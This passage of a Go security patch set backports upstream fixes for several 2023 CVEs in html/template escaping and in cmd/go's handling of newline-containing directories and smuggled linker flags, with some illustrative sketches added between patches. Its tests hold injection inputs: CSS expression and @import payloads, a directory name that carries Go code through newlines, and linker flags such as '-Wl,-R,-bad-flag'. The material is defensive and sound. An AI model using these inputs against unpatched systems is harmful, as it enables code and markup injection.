+-const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateError"
++func _() {
++ // An "invalid array index" compiler error signifies that the constant values have changed.
++ // Re-run the stringer command to generate them again.
++ var x [1]struct{}
++ _ = x[stateText-0]
++ _ = x[stateTag-1]
++ _ = x[stateAttrName-2]
++ _ = x[stateAfterName-3]
++ _ = x[stateBeforeValue-4]
++ _ = x[stateHTMLCmt-5]
++ _ = x[stateRCDATA-6]
++ _ = x[stateAttr-7]
++ _ = x[stateURL-8]
++ _ = x[stateSrcset-9]
++ _ = x[stateJS-10]
++ _ = x[stateJSDqStr-11]
++ _ = x[stateJSSqStr-12]
++ _ = x[stateJSBqStr-13]
++ _ = x[stateJSRegexp-14]
++ _ = x[stateJSBlockCmt-15]
++ _ = x[stateJSLineCmt-16]
++ _ = x[stateCSS-17]
++ _ = x[stateCSSDqStr-18]
++ _ = x[stateCSSSqStr-19]
++ _ = x[stateCSSDqURL-20]
++ _ = x[stateCSSSqURL-21]
++ _ = x[stateCSSURL-22]
++ _ = x[stateCSSBlockCmt-23]
++ _ = x[stateCSSLineCmt-24]
++ _ = x[stateError-25]
++ _ = x[stateDead-26]
++}
++
++const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSBqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateErrorstateDead"
+
+-var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 155, 170, 184, 192, 205, 218, 231, 244, 255, 271, 286, 296}
++var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 154, 167, 182, 196, 204, 217, 230, 243, 256, 267, 283, 298, 308, 317}
+
+ func (i state) String() string {
+ if i >= state(len(_state_index)-1) {
+diff --git a/src/html/template/transition.go b/src/html/template/transition.go
+index 06df679..92eb351 100644
+--- a/src/html/template/transition.go
++++ b/src/html/template/transition.go
+@@ -27,6 +27,7 @@ var transitionFunc = [...]func(context, []byte) (context, int){
+ stateJS: tJS,
+ stateJSDqStr: tJSDelimited,
+ stateJSSqStr: tJSDelimited,
++ stateJSBqStr: tJSDelimited,
+ stateJSRegexp: tJSDelimited,
+ stateJSBlockCmt: tBlockCmt,
+ stateJSLineCmt: tLineCmt,
+@@ -262,7 +263,7 @@ func tURL(c context, s []byte) (context, int) {
+
+ // tJS is the context transition function for the JS state.
+ func tJS(c context, s []byte) (context, int) {
+- i := bytes.IndexAny(s, `"'/`)
++ i := bytes.IndexAny(s, "\"`'/")
+ if i == -1 {
+ // Entire input is non string, comment, regexp tokens.
+ c.jsCtx = nextJSCtx(s, c.jsCtx)
+@@ -274,6 +275,8 @@ func tJS(c context, s []byte) (context, int) {
+ c.state, c.jsCtx = stateJSDqStr, jsCtxRegexp
+ case '\'':
+ c.state, c.jsCtx = stateJSSqStr, jsCtxRegexp
++ case '`':
++ c.state, c.jsCtx = stateJSBqStr, jsCtxRegexp
+ case '/':
+ switch {
+ case i+1 < len(s) && s[i+1] == '/':
+@@ -303,6 +306,8 @@ func tJSDelimited(c context, s []byte) (context, int) {
+ switch c.state {
+ case stateJSSqStr:
+ specials = `\'`
++ case stateJSBqStr:
++ specials = "`\\"
+ case stateJSRegexp:
+ specials = `\/[]`
+ }
+--
+2.7.4
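Illustrative sketch (not part of the patch series): once this patch is in place, html/template refuses to evaluate an action inside a JavaScript backtick template literal unless GODEBUG=jstmpllitinterp=1 is set. The template source below is an assumed example; the error it reports comes from the errJSTmplLit case added above.

    package main

    import (
            "fmt"
            "html/template"
            "os"
    )

    func main() {
            const src = "<script>var tmpl = `greeting: {{.}}`;</script>"
            tmpl := template.Must(template.New("demo").Parse(src))
            // Escaping happens lazily on the first Execute, which is where
            // the "appears in a JS template literal" error surfaces.
            if err := tmpl.Execute(os.Stdout, "hi"); err != nil {
                    fmt.Fprintln(os.Stderr, err)
            }
    }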
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24539.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24539.patch
new file mode 100644
index 0000000000..281b6486a8
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24539.patch
@@ -0,0 +1,60 @@
+From 8673ca81e5340b87709db2d9749c92a3bf925df1 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Thu, 13 Apr 2023 15:40:44 -0700
+Subject: [PATCH] html/template: disallow angle brackets in CSS values
+
+Angle brackets should not appear in CSS contexts, as they may affect
+token boundaries (such as closing a <style> tag, resulting in
+injection). Instead emit filterFailsafe, matching the behavior for other
+dangerous characters.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Fixes #59720
+Fixes CVE-2023-24539
+
+Change-Id: Iccc659c9a18415992b0c05c178792228e3a7bae4
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1826636
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/491615
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Run-TryBot: Carlos Amedee <carlos@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport from [https://github.com/golang/go/commit/8673ca81e5340b87709db2d9749c92a3bf925df1]
+CVE: CVE-2023-24539
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+---
+ src/html/template/css.go | 2 +-
+ src/html/template/css_test.go | 2 ++
+ 2 files changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/src/html/template/css.go b/src/html/template/css.go
+index 890a0c6b227fe..f650d8b3e843a 100644
+--- a/src/html/template/css.go
++++ b/src/html/template/css.go
+@@ -238,7 +238,7 @@ func cssValueFilter(args ...any) string {
+ // inside a string that might embed JavaScript source.
+ for i, c := range b {
+ switch c {
+- case 0, '"', '\'', '(', ')', '/', ';', '@', '[', '\\', ']', '`', '{', '}':
++ case 0, '"', '\'', '(', ')', '/', ';', '@', '[', '\\', ']', '`', '{', '}', '<', '>':
+ return filterFailsafe
+ case '-':
+ // Disallow <!-- or -->.
+diff --git a/src/html/template/css_test.go b/src/html/template/css_test.go
+index a735638b0314f..2b76256a766e9 100644
+--- a/src/html/template/css_test.go
++++ b/src/html/template/css_test.go
+@@ -231,6 +231,8 @@ func TestCSSValueFilter(t *testing.T) {
+ {`-exp\000052 ession(alert(1337))`, "ZgotmplZ"},
+ {`-expre\0000073sion`, "-expre\x073sion"},
+ {`@import url evil.css`, "ZgotmplZ"},
++ {"<", "ZgotmplZ"},
++ {">", "ZgotmplZ"},
+ }
+ for _, test := range tests {
+ got := cssValueFilter(test.css)
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24540.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24540.patch
new file mode 100644
index 0000000000..799a0dfcda
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24540.patch
@@ -0,0 +1,90 @@
+From ce7bd33345416e6d8cac901792060591cafc2797 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Tue, 11 Apr 2023 16:27:43 +0100
+Subject: [PATCH] [release-branch.go1.19] html/template: handle all JS
+ whitespace characters
+
+Rather than just a small set. Character class as defined by \s [0].
+
+Thanks to Juho Nurminen of Mattermost for reporting this.
+
+For #59721
+Fixes #59813
+Fixes CVE-2023-24540
+
+[0] https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions/Character_Classes
+
+Change-Id: I56d4fa1ef08125b417106ee7dbfb5b0923b901ba
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1821459
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1851497
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/491355
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+TryBot-Bypass: Carlos Amedee <carlos@golang.org>
+Run-TryBot: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/ce7bd33345416e6d8cac901792060591cafc2797]
+CVE: CVE-2023-24540
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/html/template/js.go | 8 +++++++-
+ src/html/template/js_test.go | 11 +++++++----
+ 2 files changed, 14 insertions(+), 5 deletions(-)
+
+diff --git a/src/html/template/js.go b/src/html/template/js.go
+index fe7054efe5cd8..4e05c1455723f 100644
+--- a/src/html/template/js.go
++++ b/src/html/template/js.go
+@@ -13,6 +13,11 @@ import (
+ "unicode/utf8"
+ )
+
++// jsWhitespace contains all of the JS whitespace characters, as defined
++// by the \s character class.
++// See https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_expressions/Character_classes.
++const jsWhitespace = "\f\n\r\t\v\u0020\u00a0\u1680\u2000\u2001\u2002\u2003\u2004\u2005\u2006\u2007\u2008\u2009\u200a\u2028\u2029\u202f\u205f\u3000\ufeff"
++
+ // nextJSCtx returns the context that determines whether a slash after the
+ // given run of tokens starts a regular expression instead of a division
+ // operator: / or /=.
+@@ -26,7 +31,8 @@ import (
+ // JavaScript 2.0 lexical grammar and requires one token of lookbehind:
+ // https://www.mozilla.org/js/language/js20-2000-07/rationale/syntax.html
+ func nextJSCtx(s []byte, preceding jsCtx) jsCtx {
+- s = bytes.TrimRight(s, "\t\n\f\r \u2028\u2029")
++ // Trim all JS whitespace characters
++ s = bytes.TrimRight(s, jsWhitespace)
+ if len(s) == 0 {
+ return preceding
+ }
+diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
+index e07c695f7a77d..e52180cc113b5 100644
+--- a/src/html/template/js_test.go
++++ b/src/html/template/js_test.go
+@@ -81,14 +81,17 @@ func TestNextJsCtx(t *testing.T) {
+ {jsCtxDivOp, "0"},
+ // Dots that are part of a number are div preceders.
+ {jsCtxDivOp, "0."},
++ // Some JS interpreters treat NBSP as a normal space, so
++ // we must too in order to properly escape things.
++ {jsCtxRegexp, "=\u00A0"},
+ }
+
+ for _, test := range tests {
+- if nextJSCtx([]byte(test.s), jsCtxRegexp) != test.jsCtx {
+- t.Errorf("want %s got %q", test.jsCtx, test.s)
++ if ctx := nextJSCtx([]byte(test.s), jsCtxRegexp); ctx != test.jsCtx {
++ t.Errorf("%q: want %s got %s", test.s, test.jsCtx, ctx)
+ }
+- if nextJSCtx([]byte(test.s), jsCtxDivOp) != test.jsCtx {
+- t.Errorf("want %s got %q", test.jsCtx, test.s)
++ if ctx := nextJSCtx([]byte(test.s), jsCtxDivOp); ctx != test.jsCtx {
++ t.Errorf("%q: want %s got %s", test.s, test.jsCtx, ctx)
+ }
+ }
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29400.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29400.patch
new file mode 100644
index 0000000000..092c7aa0ff
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29400.patch
@@ -0,0 +1,94 @@
+From 0d347544cbca0f42b160424f6bc2458ebcc7b3fc Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Thu, 13 Apr 2023 14:01:50 -0700
+Subject: [PATCH] html/template: emit filterFailsafe for empty unquoted attr
+ value
+
+An unquoted action used as an attribute value can result in unsafe
+behavior if it is empty, as HTML normalization will result in unexpected
+attributes, and may allow attribute injection. If executing a template
+results in a empty unquoted attribute value, emit filterFailsafe
+instead.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Fixes #59722
+Fixes CVE-2023-29400
+
+Change-Id: Ia38d1b536ae2b4af5323a6c6d861e3c057c2570a
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1826631
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/491617
+Run-TryBot: Carlos Amedee <carlos@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport from [https://github.com/golang/go/commit/0d347544cbca0f42b160424f6bc2458ebcc7b3fc]
+CVE: CVE-2023-29400
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+---
+ src/html/template/escape.go | 5 ++---
+ src/html/template/escape_test.go | 15 +++++++++++++++
+ src/html/template/html.go | 3 +++
+ 3 files changed, 20 insertions(+), 3 deletions(-)
+
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index 4ba1d6b31897e..a62ef159f0dcd 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -382,9 +382,8 @@ func normalizeEscFn(e string) string {
+ // for all x.
+ var redundantFuncs = map[string]map[string]bool{
+ "_html_template_commentescaper": {
+- "_html_template_attrescaper": true,
+- "_html_template_nospaceescaper": true,
+- "_html_template_htmlescaper": true,
++ "_html_template_attrescaper": true,
++ "_html_template_htmlescaper": true,
+ },
+ "_html_template_cssescaper": {
+ "_html_template_attrescaper": true,
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index 3dd212bac9406..f8b2b448f2dfa 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -678,6 +678,21 @@ func TestEscape(t *testing.T) {
+ `<img srcset={{",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"}}>`,
+ `<img srcset=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,>`,
+ },
++ {
++ "unquoted empty attribute value (plaintext)",
++ "<p name={{.U}}>",
++ "<p name=ZgotmplZ>",
++ },
++ {
++ "unquoted empty attribute value (url)",
++ "<p href={{.U}}>",
++ "<p href=ZgotmplZ>",
++ },
++ {
++ "quoted empty attribute value",
++ "<p name=\"{{.U}}\">",
++ "<p name=\"\">",
++ },
+ }
+
+ for _, test := range tests {
+diff --git a/src/html/template/html.go b/src/html/template/html.go
+index bcca0b51a0ef9..a181699a5bda8 100644
+--- a/src/html/template/html.go
++++ b/src/html/template/html.go
+@@ -14,6 +14,9 @@ import (
+ // htmlNospaceEscaper escapes for inclusion in unquoted attribute values.
+ func htmlNospaceEscaper(args ...interface{}) string {
+ s, t := stringify(args...)
++ if s == "" {
++ return filterFailsafe
++ }
+ if t == contentTypeHTML {
+ return htmlReplacer(stripTags(s), htmlNospaceNormReplacementTable, false)
+ }
+
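The hunks above make html/template emit the filterFailsafe token (ZgotmplZ) whenever an action in an unquoted attribute evaluates to the empty string. A small sketch of the rendered output, assuming a toolchain that carries this backport (illustrative only, not part of the patch):

package main

import (
	"html/template"
	"os"
)

func main() {
	// With this backport applied, an empty value in an unquoted attribute is
	// replaced by the failsafe token, so HTML normalization cannot fold the
	// following attribute into the value; older toolchains emitted
	// `<p name= class=x>`, which parses as name="class=x".
	t := template.Must(template.New("t").Parse(`<p name={{.}} class=x>`))
	if err := t.Execute(os.Stdout, ""); err != nil {
		panic(err)
	}
	// Expected on a patched toolchain: <p name=ZgotmplZ class=x>
}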
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29402.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29402.patch
new file mode 100644
index 0000000000..01eed9fe1b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29402.patch
@@ -0,0 +1,201 @@
+From c160b49b6d328c86bd76ca2fff9009a71347333f Mon Sep 17 00:00:00 2001
+From: "Bryan C. Mills" <bcmills@google.com>
+Date: Fri, 12 May 2023 14:15:16 -0400
+Subject: [PATCH] [release-branch.go1.19] cmd/go: disallow package directories
+ containing newlines
+
+Directory or file paths containing newlines may cause tools (such as
+cmd/cgo) that emit "//line" or "#line" -directives to write part of
+the path into non-comment lines in generated source code. If those
+lines contain valid Go code, it may be injected into the resulting
+binary.
+
+(Note that Go import paths and file paths within module zip files
+already could not contain newlines.)
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Updates #60167.
+Fixes #60515.
+Fixes CVE-2023-29402.
+
+Change-Id: If55d0400c02beb7a5da5eceac60f1abeac99f064
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1882606
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Russ Cox <rsc@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit 41f9046495564fc728d6f98384ab7276450ac7e2)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1902229
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1904343
+Reviewed-by: Michael Knyszek <mknyszek@google.com>
+Reviewed-by: Bryan Mills <bcmills@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/501218
+Run-TryBot: David Chase <drchase@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/c160b49b6d328c86bd76ca2fff9009a71347333f]
+CVE: CVE-2023-29402
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/cmd/go/internal/load/pkg.go | 4 +
+ src/cmd/go/internal/work/exec.go | 6 ++
+ src/cmd/go/script_test.go | 1 +
+ .../go/testdata/script/build_cwd_newline.txt | 100 ++++++++++++++++++
+ 4 files changed, 111 insertions(+)
+ create mode 100644 src/cmd/go/testdata/script/build_cwd_newline.txt
+
+diff --git a/src/cmd/go/internal/load/pkg.go b/src/cmd/go/internal/load/pkg.go
+index 369a79b..d2b63b0 100644
+--- a/src/cmd/go/internal/load/pkg.go
++++ b/src/cmd/go/internal/load/pkg.go
+@@ -1697,6 +1697,10 @@ func (p *Package) load(stk *ImportStack, bp *build.Package, err error) {
+ setError(ImportErrorf(p.ImportPath, "invalid import path %q", p.ImportPath))
+ return
+ }
++ if strings.ContainsAny(p.Dir, "\r\n") {
++ setError(fmt.Errorf("invalid package directory %q", p.Dir))
++ return
++ }
+
+ // Build list of imported packages and full dependency list.
+ imports := make([]*Package, 0, len(p.Imports))
+diff --git a/src/cmd/go/internal/work/exec.go b/src/cmd/go/internal/work/exec.go
+index 9a9650b..050b785 100644
+--- a/src/cmd/go/internal/work/exec.go
++++ b/src/cmd/go/internal/work/exec.go
+@@ -458,6 +458,12 @@ func (b *Builder) build(a *Action) (err error) {
+ b.Print(a.Package.ImportPath + "\n")
+ }
+
++ if p.Error != nil {
++ // Don't try to build anything for packages with errors. There may be a
++ // problem with the inputs that makes the package unsafe to build.
++ return p.Error
++ }
++
+ if a.Package.BinaryOnly {
+ p.Stale = true
+ p.StaleReason = "binary-only packages are no longer supported"
+diff --git a/src/cmd/go/script_test.go b/src/cmd/go/script_test.go
+index ec498bb..a1398ad 100644
+--- a/src/cmd/go/script_test.go
++++ b/src/cmd/go/script_test.go
+@@ -123,6 +123,7 @@ func (ts *testScript) setup() {
+ "devnull=" + os.DevNull,
+ "goversion=" + goVersion(ts),
+ ":=" + string(os.PathListSeparator),
++ "newline=\n",
+ }
+
+ if runtime.GOOS == "plan9" {
+diff --git a/src/cmd/go/testdata/script/build_cwd_newline.txt b/src/cmd/go/testdata/script/build_cwd_newline.txt
+new file mode 100644
+index 0000000..61c6966
+--- /dev/null
++++ b/src/cmd/go/testdata/script/build_cwd_newline.txt
+@@ -0,0 +1,100 @@
++[windows] skip 'filesystem normalizes / to \'
++[plan9] skip 'filesystem disallows \n in paths'
++
++# If the directory path containing a package to be built includes a newline,
++# the go command should refuse to even try to build the package.
++
++env DIR=$WORK${/}${newline}'package main'${newline}'func main() { panic("uh-oh")'${newline}'/*'
++
++mkdir $DIR
++cd $DIR
++exec pwd
++cp $WORK/go.mod ./go.mod
++cp $WORK/main.go ./main.go
++cp $WORK/main_test.go ./main_test.go
++
++! go build -o $devnull .
++stderr 'package example: invalid package directory .*uh-oh'
++
++! go build -o $devnull main.go
++stderr 'package command-line-arguments: invalid package directory .*uh-oh'
++
++! go run .
++stderr 'package example: invalid package directory .*uh-oh'
++
++! go run main.go
++stderr 'package command-line-arguments: invalid package directory .*uh-oh'
++
++! go test .
++stderr 'package example: invalid package directory .*uh-oh'
++
++! go test -v main.go main_test.go
++stderr 'package command-line-arguments: invalid package directory .*uh-oh'
++
++
++# Since we do preserve $PWD (or set it appropriately) for commands, and we do
++# not resolve symlinks unnecessarily, referring to the contents of the unsafe
++# directory via a safe symlink should be ok, and should not inject the data from
++# the symlink target path.
++
++[!symlink] stop 'remainder of test checks symlink behavior'
++[short] stop 'links and runs binaries'
++
++symlink $WORK${/}link -> $DIR
++
++go run $WORK${/}link${/}main.go
++! stdout panic
++! stderr panic
++stderr '^ok$'
++
++go test -v $WORK${/}link${/}main.go $WORK${/}link${/}main_test.go
++! stdout panic
++! stderr panic
++stdout '^ok$' # 'go test' combines the test's stdout into stderr
++
++cd $WORK/link
++
++! go run $DIR${/}main.go
++stderr 'package command-line-arguments: invalid package directory .*uh-oh'
++
++go run .
++! stdout panic
++! stderr panic
++stderr '^ok$'
++
++go run main.go
++! stdout panic
++! stderr panic
++stderr '^ok$'
++
++go test -v
++! stdout panic
++! stderr panic
++stdout '^ok$' # 'go test' combines the test's stdout into stderr
++
++go test -v .
++! stdout panic
++! stderr panic
++stdout '^ok$' # 'go test' combines the test's stdout into stderr
++
++
++-- $WORK/go.mod --
++module example
++go 1.19
++-- $WORK/main.go --
++package main
++
++import "C"
++
++func main() {
++ /* nothing here */
++ println("ok")
++}
++-- $WORK/main_test.go --
++package main
++
++import "testing"
++
++func TestMain(*testing.M) {
++ main()
++}
+--
+2.25.1
+
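The pkg.go hunk rejects package directories whose paths contain CR or LF before any build step can leak them into //line or #line directives. A minimal sketch of that check, mirroring the added code (illustrative only, not part of the patch):

package main

import (
	"fmt"
	"strings"
)

// validPackageDir mirrors the check added to cmd/go's package loader: any
// directory path containing a carriage return or newline is rejected before
// cgo or the compiler can embed it in generated line directives.
func validPackageDir(dir string) error {
	if strings.ContainsAny(dir, "\r\n") {
		return fmt.Errorf("invalid package directory %q", dir)
	}
	return nil
}

func main() {
	fmt.Println(validPackageDir("/home/user/src/example"))
	fmt.Println(validPackageDir("/tmp/\npackage main\nfunc main() { panic(1) }\n/*"))
}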
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29404.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29404.patch
new file mode 100644
index 0000000000..61336ee9ee
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29404.patch
@@ -0,0 +1,84 @@
+From bf3c8ce03e175e870763901a3850bca01381a828 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Fri, 5 May 2023 13:10:34 -0700
+Subject: [PATCH] [release-branch.go1.19] cmd/go: enforce flags with
+ non-optional arguments
+
+Enforce that linker flags which expect arguments get them, otherwise it
+may be possible to smuggle unexpected flags through as the linker can
+consume what looks like a flag as an argument to a preceding flag (i.e.
+"-Wl,-O -Wl,-R,-bad-flag" is interpreted as "-O=-R -bad-flag"). Also be
+somewhat more restrictive in the general format of some flags.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Updates #60305
+Fixes #60511
+Fixes CVE-2023-29404
+
+Change-Id: Icdffef2c0f644da50261cace6f43742783931cff
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1876275
+Reviewed-by: Ian Lance Taylor <iant@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit 896779503cf754cbdac24b61d4cc953b50fe2dde)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1902225
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1904342
+Reviewed-by: Michael Knyszek <mknyszek@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/501217
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+Run-TryBot: David Chase <drchase@google.com>
+TryBot-Bypass: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/bf3c8ce03e175e870763901a3850bca01381a828]
+CVE: CVE-2023-29404
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/cmd/go/internal/work/security.go | 6 +++---
+ src/cmd/go/internal/work/security_test.go | 5 +++++
+ 2 files changed, 8 insertions(+), 3 deletions(-)
+
+diff --git a/src/cmd/go/internal/work/security.go b/src/cmd/go/internal/work/security.go
+index a823b20..8acb6dc 100644
+--- a/src/cmd/go/internal/work/security.go
++++ b/src/cmd/go/internal/work/security.go
+@@ -177,17 +177,17 @@ var validLinkerFlags = []*lazyregexp.Regexp{
+ re(`-Wl,-Bdynamic`),
+ re(`-Wl,-berok`),
+ re(`-Wl,-Bstatic`),
+- re(`-WL,-O([^@,\-][^,]*)?`),
++ re(`-Wl,-O[0-9]+`),
+ re(`-Wl,-d[ny]`),
+ re(`-Wl,--disable-new-dtags`),
+- re(`-Wl,-e[=,][a-zA-Z0-9]*`),
++ re(`-Wl,-e[=,][a-zA-Z0-9]+`),
+ re(`-Wl,--enable-new-dtags`),
+ re(`-Wl,--end-group`),
+ re(`-Wl,--(no-)?export-dynamic`),
+ re(`-Wl,-framework,[^,@\-][^,]+`),
+ re(`-Wl,-headerpad_max_install_names`),
+ re(`-Wl,--no-undefined`),
+- re(`-Wl,-R([^@\-][^,@]*$)`),
++ re(`-Wl,-R,?([^@\-,][^,@]*$)`),
+ re(`-Wl,--just-symbols[=,]([^,@\-][^,@]+)`),
+ re(`-Wl,-rpath(-link)?[=,]([^,@\-][^,]+)`),
+ re(`-Wl,-s`),
+diff --git a/src/cmd/go/internal/work/security_test.go b/src/cmd/go/internal/work/security_test.go
+index bd707ff..7b0b7d3 100644
+--- a/src/cmd/go/internal/work/security_test.go
++++ b/src/cmd/go/internal/work/security_test.go
+@@ -220,6 +220,11 @@ var badLinkerFlags = [][]string{
+ {"-Wl,-R,@foo"},
+ {"-Wl,--just-symbols,@foo"},
+ {"../x.o"},
++ {"-Wl,-R,"},
++ {"-Wl,-O"},
++ {"-Wl,-e="},
++ {"-Wl,-e,"},
++ {"-Wl,-R,-flag"},
+ }
+
+ func TestCheckLinkerFlags(t *testing.T) {
+--
+2.25.1
+
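The security.go hunk tightens the -Wl allow-list so flags that take arguments must actually carry them. A standalone sketch comparing the old and new -Wl,-R patterns, anchored the way cmd/go anchors its allow-list entries (illustrative only, not part of the patch):

package main

import (
	"fmt"
	"regexp"
)

func main() {
	// Old pattern: the argument may start with ',' and the rest is unchecked.
	oldR := regexp.MustCompile(`^(?:-Wl,-R([^@\-][^,@]*$))$`)
	// New pattern: an optional ',' separator, then an argument that may not
	// start with '-', ',' or '@', so another flag cannot be smuggled in.
	newR := regexp.MustCompile(`^(?:-Wl,-R,?([^@\-,][^,@]*$))$`)

	smuggled := "-Wl,-R,-bad-flag"
	fmt.Println("old allow-list accepts", smuggled, ":", oldR.MatchString(smuggled)) // true
	fmt.Println("new allow-list accepts", smuggled, ":", newR.MatchString(smuggled)) // false

	legit := "-Wl,-R,/usr/lib"
	fmt.Println("new allow-list accepts", legit, ":", newR.MatchString(legit)) // true
}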
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-1.patch
new file mode 100644
index 0000000000..70d50cc08a
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-1.patch
@@ -0,0 +1,112 @@
+From fa60c381ed06c12f9c27a7b50ca44c5f84f7f0f4 Mon Sep 17 00:00:00 2001
+From: Ian Lance Taylor <iant@golang.org>
+Date: Thu, 4 May 2023 14:06:39 -0700
+Subject: [PATCH] [release-branch.go1.20] cmd/go,cmd/cgo: in _cgo_flags use one
+ line per flag
+
+The flags that we recorded in _cgo_flags did not use any quoting,
+so a flag containing embedded spaces was mishandled.
+Change the _cgo_flags format to put each flag on a separate line.
+That is a simple format that does not require any quoting.
+
+As far as I can tell only cmd/go uses _cgo_flags, and it is only
+used for gccgo. If this patch doesn't cause any trouble, then
+in the next release we can change to only using _cgo_flags for gccgo.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Updates #60306
+Fixes #60514
+Fixes CVE-2023-29405
+
+Change-Id: I36b6e188a44c80d7b9573efa577c386770bd2ba3
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1875094
